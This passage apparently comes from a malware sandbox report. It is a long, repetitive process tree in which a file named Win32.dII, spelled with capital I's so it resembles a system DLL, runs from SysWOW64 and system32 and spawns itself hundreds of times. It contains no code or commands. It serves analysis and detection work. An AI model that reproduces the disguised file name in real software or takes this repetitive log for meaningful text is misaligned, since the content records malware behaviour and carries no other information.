        PID:2432
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        619⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        620⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        621⤵
        
        PID:184
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        622⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        623⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        624⤵
        
        PID:540
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        625⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        626⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        627⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        628⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        629⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        630⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        631⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        632⤵
        
        PID:628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        633⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        634⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        635⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        636⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        637⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        638⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        639⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        640⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        641⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        642⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        643⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        644⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        645⤵
        
        PID:908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        646⤵
        
        PID:576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        647⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        648⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        649⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        650⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        651⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        652⤵
        
        PID:280
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        653⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        654⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        655⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        656⤵
        
        PID:352
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        657⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        658⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        659⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        660⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        661⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        662⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        663⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        664⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        665⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        666⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        667⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        668⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        669⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        670⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        671⤵
        
        PID:444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        672⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        673⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        674⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        675⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        676⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        677⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        678⤵
        
        PID:696
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        679⤵
        
        PID:2820
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        680⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        681⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        682⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        683⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        684⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        685⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        686⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        687⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        688⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        689⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        690⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        691⤵
        
        PID:952
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        692⤵
        
        PID:996
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        693⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        694⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        695⤵
        
        PID:2520
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        696⤵
        
        PID:1096
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        697⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        698⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        699⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        700⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        701⤵
        
        PID:1356
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        702⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        703⤵
        
        PID:1752
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        704⤵
        
        PID:1288
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        705⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        706⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        707⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        708⤵
        
        PID:2960
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        709⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        710⤵
        
        PID:704
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        711⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        712⤵
        
        PID:1588
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        713⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        714⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        715⤵
        
        PID:1700
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        716⤵
        
        PID:1044
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        717⤵
        
        PID:964
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        718⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        719⤵
        
        PID:596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        720⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        721⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        722⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        723⤵
        
        PID:692
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        724⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        725⤵
        
        PID:776
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        726⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        727⤵
        
        PID:1100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        728⤵
        
        PID:1052
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        729⤵
        
        PID:1816
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        730⤵
        
        PID:2232
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        731⤵
        
        PID:304
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        732⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        733⤵
        
        PID:3000
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        734⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        735⤵
        
        PID:980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        736⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        737⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        738⤵
        
        PID:560
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        739⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        740⤵
        
        PID:352
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        741⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        742⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        743⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        744⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        745⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        746⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        747⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        748⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        749⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        750⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        751⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        752⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        753⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        754⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        755⤵
        
        PID:444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        756⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        757⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        758⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        759⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        760⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        761⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        762⤵
        
        PID:696
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        763⤵
        
        PID:2820
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        764⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        765⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        766⤵
        
        PID:1780
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        767⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        768⤵
        
        PID:2524
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        769⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        770⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        771⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        772⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        773⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        774⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        775⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        776⤵
        
        PID:1156
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        777⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        778⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        779⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        780⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        781⤵
        
        PID:572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        782⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        783⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        784⤵
        
        PID:568
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        785⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        786⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        787⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        788⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        789⤵
        
        PID:184
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        790⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        791⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        792⤵
        
        PID:540
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        793⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        794⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        795⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        796⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        797⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        798⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        799⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        800⤵
        
        PID:628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        801⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        802⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        803⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        804⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        805⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        806⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        807⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        808⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        809⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        810⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        811⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        812⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        813⤵
        
        PID:908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        814⤵
        
        PID:576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        815⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        816⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        817⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        818⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        819⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        820⤵
        
        PID:280
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        821⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        822⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        823⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        824⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        825⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        826⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        827⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        828⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        829⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        830⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        831⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        832⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        833⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        834⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        835⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        836⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        837⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        838⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        839⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        840⤵
        
        PID:444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        841⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        842⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        843⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        844⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        845⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        846⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        847⤵
        
        PID:696
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        848⤵
        
        PID:2820
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        849⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        850⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        851⤵
        
        PID:1780
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        852⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        853⤵
        
        PID:2524
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        854⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        855⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        856⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        857⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        858⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        859⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        860⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        861⤵
        
        PID:1156
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        862⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        863⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        864⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        865⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        866⤵
        
        PID:572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        867⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        868⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        869⤵
        
        PID:568
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        870⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        871⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        872⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\Win32.dII
        
